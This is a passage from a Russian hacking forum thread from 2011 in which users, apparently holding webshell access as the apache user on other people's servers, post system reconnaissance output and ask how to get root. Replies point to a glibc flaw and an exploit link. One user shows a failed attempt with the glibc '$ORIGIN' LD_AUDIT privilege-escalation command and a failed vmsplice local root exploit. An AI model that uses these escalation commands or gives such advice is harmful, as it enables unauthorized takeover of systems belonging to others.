Старый 23.09.2011, 22:06   #141
Ilkin
 
Регистрация: 23.09.2011
Сообщений: 5
Репутация: -1
По умолчанию

sh-3.2$ ls -la /lib/libc* /usr/bin/staprun
ls: /usr/bin/staprun: No such file or directory
-rwxr-xr-x 1 root root 1603396 Aug 14 2009 /lib/libc-2.5.so
lrwxrwxrwx 1 root root 11 Jul 22 2010 /lib/libc.so.6 -> libc-2.5.so
lrwxrwxrwx 1 root root 14 Jul 22 2010 /lib/libcap.so.1 -> libcap.so.1.10
-rwxr-xr-x 1 root root 10184 Mar 14 2007 /lib/libcap.so.1.10
-rwxr-xr-x 1 root root 191636 Aug 14 2009 /lib/libcidn-2.5.so
lrwxrwxrwx 1 root root 14 Jul 22 2010 /lib/libcidn.so.1 -> libcidn-2.5.so
lrwxrwxrwx 1 root root 17 Jul 22 2010 /lib/libcom_err.so.2 -> libcom_err.s
o.2.1
-rwxr-xr-x 1 root root 6300 Jan 21 2009 /lib/libcom_err.so.2.1
-rwxr-xr-x 1 root root 43544 Aug 14 2009 /lib/libcrypt-2.5.so
lrwxrwxrwx 1 root root 15 Jul 22 2010 /lib/libcrypt.so.1 -> libcrypt-2.5.s
o
-rwxr-xr-x 1 root root 1295264 Mar 3 2009 /lib/libcrypto.so.0.9.8e
lrwxrwxrwx 1 root root 19 Jul 22 2010 /lib/libcrypto.so.6 -> libcrypto.so.
0.9.8e



Есть ли варианты взлома? Подскажите пожалуйста.
Ilkin вне форума   Ответить с цитированием
Старый 23.09.2011, 22:09   #142
Andrey1800
 
Регистрация: 31.08.2010
Сообщений: 196
Репутация: 154
По умолчанию

глибс уязвим
Andrey1800 вне форума   Ответить с цитированием
Старый 23.09.2011, 22:13   #143
Ilkin
 
Регистрация: 23.09.2011
Сообщений: 5
Репутация: -1
По умолчанию

Есть ли для него эксплоит?
Ilkin вне форума   Ответить с цитированием
Старый 23.09.2011, 22:14   #144
_Spamer_
 
Регистрация: 06.07.2010
Сообщений: 20
Репутация: 0
По умолчанию

Ilkin https://rdot.org/forum/showthread.php?t=817
_Spamer_ вне форума   Ответить с цитированием
Старый 23.09.2011, 23:04   #145
Ilkin
 
Регистрация: 23.09.2011
Сообщений: 5
Репутация: -1
По умолчанию Проблема с рутингом2

Прочёл статью по ссылке и попробовал всё сделать по инструкции, - во время последнего действия вышло:


PHP код:
sh-3.2LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
sh
: /proc/self/fd/3Permission denied
sh
: /proc/self/fd/3Success
sh
no job control in this shell
sh
-3.2id
ERROR
ld.soobject '$ORIGIN' cannot be loaded as audit interface: cannot read
file data
ignored.
uid=48(apachegid=48(apachegroups=48(apache),2523(psaserv


Потом нашёл вот это:


http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=464953


PHP код:
-----------------------------------
 
Linux vmsplice Local Root Exploit
 By qaaz
-----------------------------------
[-] 
mmapPermission denied 
Теперь не взломается никогда...? =(
Ilkin вне форума   Ответить с цитированием
Старый 24.09.2011, 01:57   #146
col
 
Регистрация: 17.03.2011
Сообщений: 180
Репутация: 8
По умолчанию

mount дай еще
col вне форума   Ответить с цитированием
Старый 24.09.2011, 13:21   #147
Ilkin
 
Регистрация: 23.09.2011
Сообщений: 5
Репутация: -1
По умолчанию Mount...

sh-3.2$ mount
ERROR: ld.so: object '$ORIGIN' cannot be loaded as audit interface: cannot read
file data; ignored.
/dev/simfs on / type simfs (rw)
/dev/mapper/ddf1_raid1_array1p2 on /var/www type ext3 (rw,data=ordered)
/dev/mapper/ddf1_raid1_array1p2 on /var/named type ext3 (rw,data=ordered)
proc on /proc type proc (rw)
sysfs on /sys type sysfs (rw)
none on /dev type tmpfs (rw)
none on /dev/pts type devpts (rw)
none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)
Ilkin вне форума   Ответить с цитированием
Старый 25.09.2011, 16:36   #148
trashmail
 
Регистрация: 08.09.2011
Сообщений: 37
Репутация: -2
По умолчанию

Чем можно попытатся пробить Linux 2.6.18-028stab070.7 Oct 1 13:53:00 MSD 2010 i686, помимо glibc?
trashmail вне форума   Ответить с цитированием
Старый 25.09.2011, 17:11   #149
col
 
Регистрация: 17.03.2011
Сообщений: 180
Репутация: 8
По умолчанию

ничем
col вне форума   Ответить с цитированием
Старый 26.09.2011, 13:30   #150
patrig
 
Регистрация: 20.01.2011
Сообщений: 3
Репутация: 0
Lightbulb

Подскажите, как / чём подняться до r00t`a?
  • 2.6.18-194.17.1.el5 #1 SMP Fri Oct 1 14:17:14 MSD 2010 x86_64 GNU/Linux

ls -la /boot
Цитата:
total 8
drwxr-xr-x 2 root root 4096 Feb 2 2010 .
drwxr-xr-x 24 root root 4096 Sep 22 15:36 ..
df -h
Цитата:
Filesystem Size Used Avail Use% Mounted on
/dev/simfs 30G 20G 11G 66% /
tmpfs 256M 0 256M 0% /lib/init/rw
tmpfs 256M 0 256M 0% /dev/shm
ls -la /lib/libc* /usr/bin/staprun
Цитата:
ls: cannot access /usr/bin/staprun: No such file or directory
-rwxr-xr-x 1 root root 1375536 Jun 6 2010 /lib/libc-2.7.so
lrwxrwxrwx 1 root root 11 Sep 28 2010 /lib/libc.so.6 -> libc-2.7.so
lrwxrwxrwx 1 root root 14 Jun 19 2010 /lib/libcap.so.1 -> libcap.so.1.10
-rw-r--r-- 1 root root 14880 Mar 16 2006 /lib/libcap.so.1.10
lrwxrwxrwx 1 root root 14 Jun 19 2010 /lib/libcap.so.2 -> libcap.so.2.11
-rw-r--r-- 1 root root 16976 Jul 26 2008 /lib/libcap.so.2.11
lrwxrwxrwx 1 root root 17 Jun 19 2010 /lib/libcfont.so.0 -> libcfont.so.0.
0.0
-rw-r--r-- 1 root root 12776 Apr 16 2008 /lib/libcfont.so.0.0.0
-rw-r--r-- 1 root root 190760 Jun 6 2010 /lib/libcidn-2.7.so
lrwxrwxrwx 1 root root 14 Sep 28 2010 /lib/libcidn.so.1 -> libcidn-2.7.so
lrwxrwxrwx 1 root root 17 Jun 19 2010 /lib/libcom_err.so.2 -> libcom_err.s
o.2.1
-rw-r--r-- 1 root root 11648 Oct 13 2008 /lib/libcom_err.so.2.1
lrwxrwxrwx 1 root root 19 Jun 19 2010 /lib/libconsole.so.0 -> libconsole.s
o.0.0.0
-rw-r--r-- 1 root root 140840 Apr 16 2008 /lib/libconsole.so.0.0.0
-rw-r--r-- 1 root root 39112 Jun 6 2010 /lib/libcrypt-2.7.so
lrwxrwxrwx 1 root root 15 Sep 28 2010 /lib/libcrypt.so.1 -> libcrypt-2.7.s
o
lrwxrwxrwx 1 root root 19 Jun 19 2010 /lib/libctutils.so.0 -> libctutils.s
o.0.0.0
-rw-r--r-- 1 root root 21024 Apr 16 2008 /lib/libctutils.so.0.0.0
patrig вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot